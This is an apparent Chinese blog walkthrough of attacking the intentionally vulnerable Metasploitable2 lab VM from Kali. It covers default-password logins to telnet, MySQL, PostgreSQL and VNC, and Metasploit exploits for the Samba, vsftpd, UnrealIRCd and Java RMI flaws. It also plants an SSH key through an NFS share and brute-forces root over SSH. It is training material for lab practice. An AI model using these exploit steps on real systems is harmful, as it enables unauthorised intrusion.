metasploitable2渗透测试
一、系统弱密码登录
1、在kali上执行命令行telnet 192.168.26.129
2、Login和password都输入msfadmin
3、登录成功,进入系统
4、测试如下:
二、MySQL弱密码登录:
1、在kali上执行mysql –h 192.168.26.129 –u root
2、登录成功,进入MySQL系统
3、测试效果:
三、PostgreSQL弱密码登录
1、在Kali上执行psql -h 192.168.26.129 –U postgres
2、输入密码:postgres
3、登录成功,进入postgresql系统
测试效果
四、VNC弱密码登录
1、在kali图形界面的终端中执行vncviewer 192.168.26.129
2、输入密码 password
3、登录成功,进入系统
测试效果:
五、Samba MS-RPC Shell 命令注入漏洞
利用步骤
1.在kali中执行msfconsole,启动metasploit
2.Use exploit/multi/samba/usermap_script,选择漏洞库
3.Set RHOST 192.168.26.129 设置要攻击的机器IP
4.Exploit,开始攻击
5.利用成功,执行uname –a 验证
测试效果:
六、Vsftpd源码包后门漏洞
步骤
1、在kali中执行msfconsole,启动metasploit
2、use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞
3、set RHOST 192.168.26.129
4、利用成功,执行uname –a 验证
5、测试过程:
七、UnreallRCd后门漏洞
步骤
1、在kali中执行msfconsole,启动metasploit
2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞
set RHOST 192.168.26.129 ,设置要攻击的目标IP地址
3、开始攻击
4、利用成功!使用uname –a 验证
测试效果:
- 八、Linux NFS共享目录配置漏洞
问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步
步骤
- 在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启
- showmount –e 19168.26.129 查看其设置的远程目录列表
- 输入ssh-keygen 生成RSA公钥
- 依次输入:
(1)mount –t nfs 192.168.26.129://tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;
注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount
(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:
(3)ssh root@192.168.26.129,实现无密码登录
九、Java RMI SERVER 命令执行漏洞(1099/tcp)
1.Nmap –p 0-65535 192.168.26.129 来查看1099端口是否开启
2.进入msfconsole框架,依次输入以下命令:
1)use exploit/multi/misc/java_rmi_server
2)set RHOST 192.168.26.129(靶机的IP地址)
3)run
4)session
5)shell(进入meterpreter时执行)
十、Root用户弱口令漏洞(SSH爆破)
步骤
- 输入nmap –sV -O(大写) 192.168.26.129 查看SSh端口是否开启
- 开启metasploit framework 框架,依次输入:
- use auxiliary/scanner/ssh/ssh_login
- set RHOSTS 192.168.26.129
- set USERNAME root
- set PASS_FILE pass.txt(字典文件,需要预先生成)
- set THREADS 50
- run
我在网上找了Metasploitable2 靶机,下载了解压出来,打开直接能用
链接:https://pan.baidu.com/s/1gV75x5wV4-1TsDTIZoImXw
提取码:gx9z
metasploitable2渗透测试相关推荐
- 看完这篇 教你玩转渗透测试靶机——Metasploitable2
Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载: Metasploitable2靶机安装: Metasploitable2 ...
- 通过Metasploitable2了解渗透测试基本思路
0×00 前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机.此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术.Metasploit ...
- Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap
Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap 网络扫描和嗅探工具--Nmap Nmap也就网络映射器(Network Mapper),是一个免费开放的网络扫描和嗅探工具.该工具可以扫描 ...
- metasploit 一款开源的渗透测试框架
渗透神器漏洞利用框架metasploit from: https://zhuanlan.zhihu.com/p/30743401 metasploit是一款开源的渗透测试框架软件也是一个逐步发展与成熟 ...
- Deep Exploit:结合机器学习的全自动渗透测试工具
Deep Exploit是一款可与Metasploit链接使用,且结合机器学习的全自动渗透测试工具. Deep Exploit有两种模式: 智能模式(Intelligence mode) Deep E ...
- 网络渗透测试实验三 XSS和SQL
网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...
- 网络渗透测试实验二(网络扫描与网络侦察)
实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 系统环境:Kali Linux 2.Windows 网 ...
- 渗透测试实战指南笔记
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache.Nginx.MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包. 首先,下载需要的安装包 ...
- kail之MSF渗透测试
kail之MSF渗透测试实战 注:这是我从xmind笔记上导入过来的,排版可能没那么好,后期我会再整理,有什么意见问题大家可以留言或者私信 本文目录 kail之MSF渗透测试实战 kail问题解答及m ...
最新文章
- java 小对话框_创建Java对话框
- 在 VC6 中使用 GdiPlus-使用
- Qt 设置窗口背景图片的几种方法
- 小鑫の日常系列故事(十)——排名次_JAVA
- 【MySQL】求每门科目成绩排名前二的学生信息
- C语言algorithm主函数,C语言中主函数中相关有关问题?
- 计算机 360云盘删除,xp系统下如何删除360云盘显示图标
- openlayers5之view缩放定位
- 信息的哲学--从信息到数据存储,再到数据保护
- 基于 HTML5 WebGL 的 3D 工控裙房系统 1
- 自动驾驶芯片争夺战:英特尔用EyeQ5对标英伟达Xavier | CES
- wow服务器文件夹,《60级魔兽世界WTFWDB文件夹全解析 by Qcat》
- 【jQueryWEUI】自定义对话框-带有textarea
- 华为P7解锁码申请及解锁详细教程
- “github中文版”来了,这个神器一键帮你汉化
- 学生成绩管理系统 easyx库(半成品
- 微信公众号开发,微信支付功能开发(网页JSAPI调用)
- Linux(Centos 7)使用tcpdump抓取流量包
- 矩阵的转置与矩阵的逆
- html网页常用功能:下拉框模糊搜索